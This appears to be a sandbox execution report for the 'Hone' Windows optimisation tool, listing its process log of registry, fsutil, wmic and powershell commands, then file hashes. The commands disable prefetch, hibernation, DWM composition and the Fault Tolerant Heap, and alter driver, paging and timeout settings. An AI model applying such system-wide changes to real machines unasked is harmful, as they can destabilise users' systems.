C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\System32\choice.exe
C:\Windows\System32\choice.exe /c:12X /n /m " >:"
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\PriorityControl" /v "Win32PrioritySeparation" /t REG_DWORD /d "38" /f
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Hone" /v "MemoryTweaks" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\FTH" /v "Enabled" /t Reg_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\DWM" /v "Composition" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t Reg_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows\AppPrivacy" /v "LetAppsRunInBackground" /t Reg_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BackgroundAppGlobalToggle" /t Reg_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "DisablePagingExecutive" /t Reg_DWORD /d "1" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -Command "Disable-MMAgent -PagingCombining -mc"
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\Session Manager\Memory Management" /v "DisablePageCombining" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "LargeSystemCache" /t Reg_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\Session Manager" /v "HeapDeCommitFreeBlockThreshold" /t REG_DWORD /d "262144" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v "DontVerifyRandomDrivers" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v "LongPathsEnabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t Reg_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnableSuperfetch" /t Reg_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v "HiberbootEnabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v "HibernateEnabledDefault" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v "HibernateEnabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v "WaitToKillAppTimeout" /t Reg_SZ /d "1000" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control" /v "WaitToKillServiceTimeout" /t Reg_SZ /d "1000" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v "HungAppTimeout" /t Reg_SZ /d "1000" /f
C:\Windows\system32\fsutil.exe
fsutil behavior set memoryusage 2
C:\Windows\system32\fsutil.exe
fsutil behavior set mftzone 2
C:\Windows\system32\fsutil.exe
fsutil behavior set disablelastaccess 1
C:\Windows\system32\fsutil.exe
fsutil behavior set encryptpagingfile 0
C:\Windows\system32\fsutil.exe
fsutil behavior set disable8dot3 1
C:\Windows\system32\fsutil.exe
fsutil behavior set disablecompression 1
C:\Windows\system32\fsutil.exe
fsutil behavior set disabledeletenotify 0
C:\Windows\system32\cmd.exe
cmd /V:ON /C @echo off
C:\Windows\system32\mode.com
Mode 65,16
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_VideoController get VideoProcessor /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GeForce"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "NVIDIA"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "RTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "GTX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "AMD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Ryzen"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "Intel"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
C:\Windows\system32\find.exe
find "UHD"
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Mouse" /v "MouseSpeed" /t REG_SZ /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Mouse" /v "MouseThreshold1" /t REG_SZ /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Mouse" /v "MouseThreshold2" /t REG_SZ /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Mouse" /v "MouseSensitivity" /t REG_SZ /d "10" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve" /t REG_BINARY /d "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000" /f
C:\Windows\system32\control.exe
control.exe desk.cpl,Settings,@Settings
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL desk.cpl,Settings,@Settings
C:\Windows\explorer.exe
"C:\Windows\explorer.exe" ms-settings:display
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Mouse" /v "SmoothMouseXCurve" /t REG_BINARY /d "0000000000000000C0CC0C0000000000809919000000000040662600000000000033330000000000" /f
C:\Windows\system32\cmd.exe
cmd /V:ON /C @echo off
C:\Windows\system32\mode.com
Mode 65,16
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_NetworkAdapter get PNPDeviceID
C:\Windows\system32\findstr.exe
findstr /L "VEN_"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
C:\Windows\System32\Wbem\WMIC.exe
wmic os get TotalVisibleMemorySize /value
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NVTTweaks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
C:\Windows\system32\findstr.exe
findstr "HKEY"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
C:\Windows\system32\find.exe
find "0x1"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
C:\Windows\system32\find.exe
find "0x0"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
C:\Windows\system32\find.exe
find "0x4"
C:\Windows\system32\reg.exe
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
C:\Windows\system32\find.exe
find "0x3"
C:\Windows\system32\powercfg.exe
powercfg /GetActiveScheme
C:\Windows\system32\find.exe
find "Hone"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NpiTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "TCPIP"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MemoryTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "InternetTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "ServicesTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "DebloatTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "AffinityTweaks"
C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
C:\Windows\system32\reg.exe
reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
C:\Windows\system32\find.exe
find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
C:\Windows\system32\reg.exe
reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
C:\Windows\system32\find.exe
find "0x400"
C:\Windows\system32\sc.exe
sc query STR
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\system32\sc.exe
sc query HoneAudio
C:\Windows\system32\find.exe
find "RUNNING"
C:\Windows\System32\Wbem\WMIC.exe
wmic path Win32_Battery Get BatteryStatus
C:\Windows\system32\find.exe
find "1"
Network
| Country | Destination | Domain | Proto |
Files
| MD5 | ec3c3bcd86266e5a9dc286032b0046f3 |
| SHA1 | 31205b539bacbfe684b799c2fc3c89497d4d706d |
| SHA256 | 65de26b2c5e000547c11d0d64f87afbce00ffa6e7f858ce0c96ce4b53973ce5d |
| SHA512 | 5632408912919a900be629ce7838c9610cfd7c5bbbb47be4a3a6325a0ac720bfdcd1d4a181c3fa2c0824bb5feb37a022836de7f5eec2b9a9e913d9a6a3b5235c |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\RepairApprove.pdf
| MD5 | bc38348960550c99d68b15ac3253fd6d |
| SHA1 | a78d5ebb673465830ad06720dd54739b013d44ce |
| SHA256 | 8d080b786caf9b36fadaef9063d36885fdebc5c1b8222a84582bb45722002302 |
| SHA512 | a0dd71248af3e4cbf4987bcafd7bd04a9a34249dcc7731ad344f00adcf03cd0ec620717a20a0b9aad02ce858f62d59075ff1fe5983e919500b3ccd74c58dac1b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\ResolveSwitch.docx
| MD5 | 33c4c952892f6fd578b9c8b4f9779271 |
| SHA1 | a2ce70b65f1e3599d84f5479f0860bc2753704b5 |
| SHA256 | 4623c39393fda37e18041c7124487447975d56735dbcd78ba019fec2ebede8d1 |
